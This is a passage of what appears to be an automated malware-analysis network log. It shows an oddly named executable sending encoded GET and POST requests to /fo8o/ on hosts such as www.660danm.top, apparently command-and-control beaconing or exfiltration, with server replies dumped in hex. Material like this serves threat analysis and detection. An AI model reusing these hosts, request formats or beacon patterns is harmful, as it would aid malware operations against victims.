                                                    Data Ascii: Zl4h1=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/RQCfKKPHwXJbI2NpE9U20f8ju0pnN69Xmm9CwTGNNupx5Z4WUfXAcKdHrjG638+ce+KoFyxoGrr6gTO1GHh2tkjVq0DQ0YheuU3N4namSplWwnYvMSnHT7EdKhzeMDKBBYOK54Cerx97INLvY77RMPkM8a4NqIfJ+LUbPdan5y6nmVg2T15O46SSiICnn9sPdrClkySxPg90+66sxn7el0a2jZuvi1pdjOQsqgIiWprkBJlhEh1NhP2yB6BpMTRyRR18VzsLWGDTbI4xG5vyJrCevX6+5B/r1EYjdsjOp+DPmOdk1YHdHRiViLJUfW3PirtZMZ8OrKBsAiZIxR0Y+ripZz+xrGE/MGseBI+LQNdmD5r4+zv46FRgFALbTFz1rQV7kIBN3sjnCo9PbU1U2qE5jN181Kyu/WeSwIISg81W2kOVQMxA13Knc2Qy2U9YOQyv5T1PYl6CkpUwvjeo6X+bg53m6eut7pmh0wUPJWKlvTzVXTBc+bVFv4N4MxfqcSA3lF38CLhLNwTr8a5b3iZsTt0RlynJrsHFPANn5eZ6Zx3UMOJc9N5h0uShjmbn0HkYh16/uiwOVS/vt9P+giAHczm6uFT7ayDHBcJr7LMBNbPfzyYgbFe4xr5c6R94jvNeTAeIcpW2NmfLR+l8KmcqqXr9WBnIwlITeTlbiyCmipixcMFKq7N3fbLbBiFRY6ep9OTpigsAuK/LPSh5gicNUNol5DteqqmxSb5aa3lpDvRdCgmQ+Qj1eX9lRCFN9PrSOC5WfLtJEeSCeRkdR/RKUIuHWrHi5RHvPWJ04REXaFmh5SfaM3Qe5JJWfj/SUIZu [TRUNCATED]
                                                    Jun 9, 2024 18:01:58.227813959 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:58 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Sorting-Hat-PodId: 311
                                                    X-Sorting-Hat-ShopId: 87850025272
                                                    Vary: Accept-Encoding
                                                    x-frame-options: DENY
                                                    x-shopid: 87850025272
                                                    x-shardid: 311
                                                    x-request-id: 15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918
                                                    server-timing: processing;dur=16
                                                    content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918
                                                    x-content-type-options: nosniff
                                                    x-download-options: noopen
                                                    x-permitted-cross-domain-policies: none
                                                    x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918
                                                    x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1
                                                    Content-Encoding: gzip
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cd9AGpCCqtgQRFCV1u0V2XfpVVbjuAUBO0%2B%2FLFhYx
                                                    Data Raw:
                                                    Data Ascii:
                                                    Jun 9, 2024 18:01:58.227834940 CEST1236INData Raw: 39 32 55 67 4c 37 55 6e 54 62 77 25 32 42 51 34 6d 25 32 46 51 70 42 31 33 51 44 64 55 79 33 25 32 42 73 71 34 34 45 51 31 6c 4b 6c 32 78 48 4d 78 55 44 79 4b 46 64 76 33 53 49 57 41 61 4f 76 42 6b 6c 38 54 6c 56 55 6e 50 62 70 63 77 46 71 75 36
                                                    Data Ascii: 92UgL7UnTbw%2BQ4m%2FQpB13QDdUy3%2Bsq44EQ1lKl2xHMxUDyKFdv3SIWAaOvBkl8TlVUnPbpcwFqu6I9h2FjiUw8DRbBl0rK9cBS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDurat
                                                    Jun 9, 2024 18:01:58.227852106 CEST424INData Raw: 37 05 2f a9 07 e1 33 8f 75 5e b2 23 1a a8 87 20 e9 a9 01 e6 86 c9 cd 00 d6 70 73 f1 6e a8 91 91 e4 0a 91 c2 6f 42 03 54 cc aa 57 21 87 7f 9e 0a bb fa 4c 42 b5 9c 11 03 b9 ba 3d 32 7a fa 92 3f 6c 9c 10 1e af 24 44 78 e9 20 18 4d 7a 68 f0 1b 27 f2
                                                    Data Ascii: 7/3u^# psnoBTW!LB=2z?l$Dx Mzh'#= 8N\8@5$%h^TvkgLaz*h0fOnGKaxjyK5Ak{84@#X5>pI{=qr(s0T\aSK
                                                    Jun 9, 2024 18:01:58.227880955 CEST414INData Raw: e8 44 fc a0 13 70 9a 8a 2f df af bf 7c 8f 55 8a 98 2b dd 7a 37 4e 3c 1e a8 c7 e6 77 ce a0 ca f4 74 eb dc e4 81 c2 e1 df 41 02 d7 d3 85 1b af d0 ad 5d f9 eb e5 52 e1 03 1f 6e 0c 30 2d 60 33 2c 14 88 21 c6 f6 38 f5 63 c5 6a 18 86 0d 00 6d 56 10 44
                                                    Data Ascii: Dp/|U+z7N<wtA]Rn0-`3,!8cjmVD R-G/nxkA+U_9vN|f@n+Zx.EgGgMmcUPH5 c2o>^]Avxg/oc[6=Q


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.114974423.227.38.74806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:00.085303068 CEST511OUTGET /fo8o/?Zl4h1=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThuOdW8gsoVxhB1RUuBib7W4ojAwcpXLMk0=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.donnavariedades.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:02:00.753556967 CEST1236INHTTP/1.1 301 Moved Permanently
                                                    Date: Sun, 09 Jun 2024 16:02:00 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Sorting-Hat-PodId: 311
                                                    X-Sorting-Hat-ShopId: 87850025272
                                                    X-Storefront-Renderer-Rendered: 1
                                                    location: https://donnavariedades.com/fo8o?Zl4h1=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThuOdW8gsoVxhB1RUuBib7W4ojAwcpXLMk0=&Pbw=PLVXbnG85
                                                    x-redirect-reason: https_required
                                                    x-frame-options: DENY
                                                    content-security-policy: frame-ancestors 'none';
                                                    x-shopid: 87850025272
                                                    x-shardid: 311
                                                    vary: Accept
                                                    powered-by: Shopify
                                                    server-timing: processing;dur=16;desc="gc:1", db;dur=6, asn;desc="8100", edge;desc="DFW", country;desc="US", pageType;desc="404", servedBy;desc="qnq2", requestID;desc="c7018738-bc5d-432d-8e0e-246b17f15ef1-1717948920"
                                                    x-dc: gcp-us-south1,gcp-us-central1,gcp-us-central1
                                                    x-request-id: c7018738-bc5d-432d-8e0e-246b17f15ef1-1717948920
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yb5fScUvnW%2BrgCHE%2FkA6PF3N8BPf2KHisi7YQHe2EhRzK%2B%2F7%2FuWlrqWqG90wmwjArNGCdIFTd4MKo7zk4nQ2ATmJHcx0dYWgP4qwjiQ4dBm9E%2BVD%2BiLcRsPr6vdybue4KmsQMS%2BL14kD"}],"group":"cf-nel","
                                                    Data Raw:
                                                    Data Ascii:
                                                    Jun 9, 2024 18:02:00.753591061 CEST357INData Raw: 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                    Data Ascii: ax_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=53.999901X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.114974534.111.148.214806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:06.181360960 CEST767OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.660danm.top
                                                    Origin: http://www.660danm.top
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.660danm.top/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6b 38 49 71 59 6a 43 7a 72 6b 6e 71 78 6c 42 78 35 70 5a 6a 48 37 48 51 6f 33 33 56 6e 4e 4a 72 64 76 4c 2b 69 6b 6b 4f 71 77 75 78 48 64 32 43 33 33 31 45 37 55 6c 43 70 79 65 5a 55 37 2f 37 62 31 55 47 42 61 6e 55 50 36 50 66 52 70 71 53 54 70 39 69 47 4a 68 2f 4a 45 41 4f 6f 74 78 50 51 53 71 30 43 62 44 6e 33 4c 32 45 2b 63 6f 35 56 39 67 76 6f 71 6b 79 49 6e 54 43 69 35 73 55 55 30 64 55 73 32 39 38 48 55 79 30 33 4e 46 66 35 44 6f 4e 55 6c 33 73 50 76 69 6c 41 51 49 6d 73 52 35 49 30 69 46 39 31 57 53 5a 57 58 51 55 48 44 50 2b 2f 67 3d 3d
                                                    Data Ascii: Zl4h1=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNUl3sPvilAQImsR5I0iF91WSZWXQUHDP+/g==
                                                    Jun 9, 2024 18:02:06.957585096 CEST728INHTTP/1.1 405 Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Sun, 09 Jun 2024 16:02:06 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.114974634.111.148.214806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:08.859790087 CEST787OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.660danm.top
                                                    Origin: http://www.660danm.top
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.660danm.top/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 61 62 43 78 78 6b 4f 79 71 33 6b 6d 74 62 6c 43 32 6d 35 6e 76 48 5a 54 4a 2b 59 43 76 30 31 75 45 3d
                                                    Data Ascii: Zl4h1=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FabCxxkOyq3kmtblC2m5nvHZTJ+YCv01uE=
                                                    Jun 9, 2024 18:02:09.645539045 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Sun, 09 Jun 2024 16:02:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jun 9, 2024 18:02:09.645685911 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.114974734.111.148.214806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:11.395791054 CEST1800OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.660danm.top
                                                    Origin: http://www.660danm.top
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.660danm.top/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 4d 39 68 52 46 51 68 41 4d 57 6b 30 57 32 5a 58 6f 4b 47 79 6d 48 67 57 78 59 69 6a 71 67 37 79 54 37 5a 6d 35 78 4e 53 6a 49 70 72 4f 47 63 38 44 63 57 73 6a 55 47 63 58 65 7a 52 68 39 4e 42 4c 31 4c 31 58 78 39 49 4b 55 6c 62 34 44 77 33 36 37 49 69 6a 4a 4b 69 58 76 7a 73 7a 68 5a 4e 74 54 53 6e 6f 71 39 7a 49 56 52 78 46 2b 6d 48 30 71 4f 61 63 77 37 4b 71 74 36 58 4d 41 72 49 30 30 52 6b 2b 58 57 34 33 57 7a 4b 46 53 47 4a 63 67 33 34 55 67 36 58 43 74 74 76 4f 70 59 48 44 73 [TRUNCATED]
                                                    Data Ascii: Zl4h1=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/lrd8D+jG8OowuxFd2GoH0N7VBOpyOjU5T7aW8GHcTTcKPdVpqdTp93GNF7JE00ot5PQkW0ErDgpb2E+co1V9gToq9hIm6aiKkUUWVU/H97BUyw9tEt9TVmMlWjWNzXICM9hRFQhAMWk0W2ZXoKGymHgWxYijqg7yT7Zm5xNSjIprOGc8DcWsjUGcXezRh9NBL1L1Xx9IKUlb4Dw367IijJKiXvzszhZNtTSnoq9zIVRxF+mH0qOacw7Kqt6XMArI00Rk+XW43WzKFSGJcg34Ug6XCttvOpYHDs2LgqPSxA4udmxAnzbTYJZfcIAsFH5RRH1G91uuA7xVssKePfPt5D/p8or1ojF02/cgD4sFpbSKJAeoVS72CpPcmhFGjxk8vMXgyNOOuo0pFJeIb4PfvqyzzezR78iUGbKriLN/lhtw2Oqzl7bEnjIsTco+fJNgjX2iEUdUNt04FMhX9CvYQrCl23mSAbRWjJIzyX/9K7buuLmWsOqxWiXXCBfTWUOzD+gMh/s/TdK5/XnfwfP/Juyv7TiqoNQubJwFkEADmiuokBcPrkL7mz+Oc/V6OUz74ZPNjRQfEzKFiag4xx1mpdihAF1PmDBC4IZs5oNs+XLo1/Sav4DLg66xAq9B7MoVxLLaYm+jfdyy+8beMhfoDTKGYBAFSHbcFg1NO1GuXyYxXzwvjz+YXLq1ZrfyOQf4jiie6hHnoSLfTGfH3BieKM9ASDxaP808y0nGScbdoDzXBM9TqUyULV6R3DuPI2YAdlThRpSDl0VL6FTWVwVYOex19l78FMenpGSOzTF3VfOApe6HUzfgcl16qVlcGVYGJUSJwSz5VvJTESiaUogjW2jEyd68oYZl6dMP4HSNOzJxeAg4FGtvZi1zN9DUq4rg9ByhIuRg0g/Nq/xzO0k1O5TQ52AAg9B3i+rgrWNPY/Q57QnWJa3qfpxRQEXikvrQZ7sp [TRUNCATED]
                                                    Jun 9, 2024 18:02:12.174079895 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Sun, 09 Jun 2024 16:02:12 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jun 9, 2024 18:02:12.176837921 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.114974834.111.148.214806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:13.937263012 CEST503OUTGET /fo8o/?Zl4h1=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/DTXti4BJBda4ZDKyYIpNZZRE2pdJDqsa0=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.660danm.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:02:14.734581947 CEST1236INHTTP/1.1 200 OK
                                                    Server: nginx/1.20.2
                                                    Date: Sun, 09 Jun 2024 16:02:14 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5161
                                                    Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                    Vary: Accept-Encoding
                                                    ETag: "65a4939c-1429"
                                                    Cache-Control: no-cache
                                                    Accept-Ranges: bytes
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 [TRUNCATED]
                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("s
                                                    Jun 9, 2024 18:02:14.734642982 CEST1236INData Raw: 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75
                                                    Data Ascii: cript")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc"
                                                    Jun 9, 2024 18:02:14.734678984 CEST1236INData Raw: 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2c 69 73 55 43 3a 65 28 29 2c 69 73 51 75 61 72 6b 3a 72 28 29 2c 69 73 5f 64 75 61 6e 6e 65 69 3a 65 28 29 7c 7c 72 28 29 7d 2c 6e 29 2c 74 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20
                                                    Data Ascii: avigator.userAgent,isUC:e(),isQuark:r(),is_duannei:e()||r()},n),t=[];for(var i in a)a.hasOwnProperty(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://t
                                                    Jun 9, 2024 18:02:14.734715939 CEST400INData Raw: 72 28 76 61 72 20 71 73 4c 69 73 74 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67
                                                    Data Ascii: r(var qsList=(window.location.search||"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=true"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setA
